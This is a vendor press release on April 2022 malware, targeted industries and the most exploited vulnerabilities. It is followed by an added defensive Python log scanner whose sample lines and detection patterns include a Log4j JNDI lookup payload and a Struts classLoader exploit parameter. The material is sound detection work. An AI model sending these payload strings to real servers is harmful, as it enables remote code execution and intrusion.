
Most wanted malware of April 2022: a jolt in the index


SAN CARLOS, Calif., May 11, 2022 (GLOBE NEWSWIRE) — Check Point Research (CPR), the threat intelligence arm of Check Point® Software Technologies Ltd. (NASDAQ:CHKP), one of the world’s leading cybersecurity solution providers, has released its latest Global Threat Index for April 2022. Researchers report that Emotet, an advanced, self-spreading and modular Trojan, is still the most prevalent malware, affecting 6% of organizations worldwide. Despite this, there has been movement for all other malware on the list. Tofsee and Nanocore dropped off the list and were replaced by Formbook and Lokibot, now the second and sixth most common malware respectively.

March’s higher Emotet score (10%) was mainly due to specific Easter-themed scams, but this month’s decrease could also be explained by Microsoft’s decision to disable specific macros associated with Office files, affecting how Emotet is usually delivered. In fact, there are reports that Emotet has a new delivery method: phishing emails containing a OneDrive URL. Emotet has many uses once it has bypassed a machine’s protections. Due to its sophisticated spreading and assimilation techniques, Emotet also offers other malware to cybercriminals on dark web forums, including banking trojans, ransomware, botnets, etc., delivered after the machine has been compromised.

Elsewhere in the index, Lokibot, an information stealer, re-entered the list in sixth place after a high-impact spam campaign spread the malware via xlsx files designed to look like legitimate invoices. This, and the rise of Formbook, impacted the position of other malware, with the AgentTesla advanced remote access trojan (RAT), for example, dropping from second to third place.

At the end of March, critical vulnerabilities were discovered in the Java Spring Framework, known as Spring4Shell, and since then many threat actors have exploited the vulnerability to spread Mirai, the ninth most widespread malware this month.

“With the ever-changing cyber threat landscape and with large corporations such as Microsoft influencing the parameters within which cybercriminals can operate, threat actors need to become more creative in how they distribute malware, as evidenced by the new delivery method currently used by Emotet,” said Maya Horowitz, Vice President of Research at Check Point. “Although it is not yet in the top ten vulnerabilities list, it should be noted that more than 35% of organizations worldwide have already been affected by this threat in its first month alone, and therefore we expect it to go up the list in the next few months.”

CPR also revealed this month that education and research continue to be the most targeted industry by cybercriminals worldwide. “Web Server Exposed Git Repository Information Disclosure” is the most exploited vulnerability, affecting 46% of organizations worldwide, closely followed by “Apache Log4j Remote Code Execution”. “Apache Struts ParametersInterceptor ClassLoader Security Bypass” soars in the index, now in third place with an overall impact of 45%.

Top Malware Families

*The arrows refer to the change in ranking compared to the previous month.

This month Emotet remains the most popular malware, affecting 6% of businesses worldwide, closely followed by Formbook, which impacts 3% of organizations, and AgentTesla with an overall impact of 2%.

  1. ↔ Emotet – Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used as a banking Trojan, but recently it is used as a distributor for other malware or malicious campaigns. It uses multiple methods to maintain persistence and evasion techniques to avoid detection. It can also spread through phishing spam emails that contain malicious attachments or links.
  2. ↑ Formbook – Formbook is an Infostealer targeting the Windows operating system and was first detected in 2016. It is marketed as Malware-as-a-Service (MaaS) in underground hacking forums for its powerful evasion techniques and its relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files based on commands from its C&C.
  3. AgentTesla – Agent Tesla is an advanced RAT functioning as a keylogger and information stealer, able to monitor and collect the victim’s keyboard input and system clipboard, take screenshots, and exfiltrate credentials for a variety of software installed on the victim’s machine (including Google Chrome, Mozilla Firefox, and Microsoft Outlook).

Top Attacked Industries Globally

This month, education/research is the most attacked industry in the world, followed by government/military and Internet service providers and managed service providers (ISPs and MSPs).

  1. Education & Research
  2. Government and military
  3. Internet Service Providers and Managed Service Providers (ISPs and MSPs)

Top Exploited Vulnerabilities

This month “Web Server Exposed Git Repository Information Disclosure” is the most exploited vulnerability, affecting 46% of organizations worldwide, closely followed by “Apache Log4j Remote Code Execution” with an overall impact of 46%. “Apache Struts ParametersInterceptor ClassLoader Security Bypass” now ranks third in the list of most exploited vulnerabilities, with an overall impact of 45%.

  1. ↑ Web Server Exposed Git Repository Information Disclosure – An information disclosure vulnerability has been reported in Git Repository. Successful exploitation of this vulnerability could allow inadvertent disclosure of account information.
  2. Apache Log4j Remote Code Execution (CVE-2021-44228) – A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
  3. Apache Struts ParametersInterceptor ClassLoader Security Bypass (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0114) – A security bypass vulnerability exists in Apache Struts. The vulnerability is caused by inadequate validation of data processed by ParametersInterceptor, allowing manipulation of the ClassLoader. A remote attacker could exploit this vulnerability by supplying a class parameter in a request.
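As an added example that is not part of Check Point’s release, the following Python scans web-server access-log lines for requests matching the three indexed vulnerabilities above, so a defender can see whether their own servers were probed and, for the exposed Git repository, whether the request actually succeeded. The Common Log Format layout, the sample lines and the signature patterns are assumptions made here, not Check Point’s detection logic.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format (not from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Apr/2022:10:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/7.68.0"
203.0.113.6 - - [15/Apr/2022:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Apr/2022:10:02:11 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.8 - - [15/Apr/2022:10:03:30 +0000] "GET /struts/action?class.classLoader.resources.dirContext.docBase=x HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Apr/2022:10:04:00 +0000] "GET /blog/?Class=intro HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# One pattern per indexed vulnerability, applied to the decoded path, referer and user agent.
SIGNATURES = {
    # Requests for the repository metadata a web server should never serve.
    "exposed-git-repo": re.compile(r"/\.git(/|$)"),
    # The JNDI lookup string that triggers CVE-2021-44228 in vulnerable Log4j versions.
    "log4j-jndi-lookup": re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE),
    # A request parameter reaching into the ClassLoader through ParametersInterceptor.
    "struts-classloader": re.compile(r"(^|[?&])class\.classLoader\.", re.IGNORECASE),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def scan_log(text):
    """Return one (client ip, signature name, HTTP status) tuple per matching log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode percent-encoding once so obvious encodings are caught; a production
        # rule would decode repeatedly (with a bound) because probes nest encodings.
        fields = [unquote(m["path"]), unquote(m["referer"]), unquote(m["ua"])]
        for name, pattern in SIGNATURES.items():
            if any(pattern.search(f) for f in fields):
                hits.append((m["ip"], name, int(m["status"])))
                break
    return hits


def confirmed_git_exposure(hits):
    """Git probes answered with 200 mean the repository really was served."""
    return [h for h in hits if h[1] == "exposed-git-repo" and h[2] == 200]
```

A 404 on the Struts or Git probe only tells you someone scanned; a 200 on `/.git/HEAD` is the disclosure the index is counting.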

Top Mobile Malware

This month AlienBot is the most prevalent mobile malware, followed by FluBot and xHelper.

  1. AlienBot – The AlienBot malware family is Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker to first inject malicious code into legitimate financial applications. The attacker gains access to victims’ accounts and ultimately has complete control over their device.
  2. FluBot – FluBot is an Android malware distributed via phishing SMS (Smishing), most often impersonating logistics delivery brands. Once the user clicks on the link inside the message, they are redirected to download a bogus application containing FluBot. Once installed, the malware has various capabilities to collect credentials and support the Smishing operation itself, including downloading the contact list and sending SMS messages to other phone numbers.
  3. xHelper – A malicious application seen in the wild since March 2019, used to download other malicious applications and display advertisements. The application is able to hide itself from the user and reinstall itself in case of uninstallation.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s ThreatCloud intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors around the world across networks, devices and mobiles. Intelligence is enhanced with AI-powered engines and proprietary research data from Check Point Research, the intelligence and research arm of Check Point Software Technologies.

The full list of the top ten malware families in April is available on Check Point’s blog.

Follow Check Point Research via:
Blog: https://research.checkpoint.com/
Twitter: https://twitter.com/_cpresearch_

About Check Point Research
Check Point Research provides cutting-edge cyber threat intelligence to Check Point Software customers and the wider intelligence community. The research team collects and analyzes global cyberattack data stored on ThreatCloud to keep hackers at bay, while ensuring that all Check Point products are updated with the latest protections. The research team consists of over 100 analysts and researchers cooperating with other security vendors, law enforcement and various CERTs.

About Check Point Software Technologies Ltd.
Check Point Software Technologies Ltd. (checkpoint.com) is a leading provider of cybersecurity solutions for businesses and governments worldwide. Check Point Infinity’s portfolio of solutions protects businesses and public organizations against 5th generation cyberattacks with an industry-leading capture rate of malware, ransomware and other threats. Infinity comprises three main pillars delivering uncompromising security and Generation V threat prevention in enterprise environments: Check Point Harmony, for remote users; Check Point CloudGuard, to automatically secure clouds; and Check Point Quantum, to protect network perimeters and data centers, all controlled by the industry’s most comprehensive and intuitive unified security management. Check Point protects more than 100,000 organizations of all sizes.

Emilie Beneitez Lefebvre Kip E. Meintzer
Check Point Software Technologies Check Point Software Technologies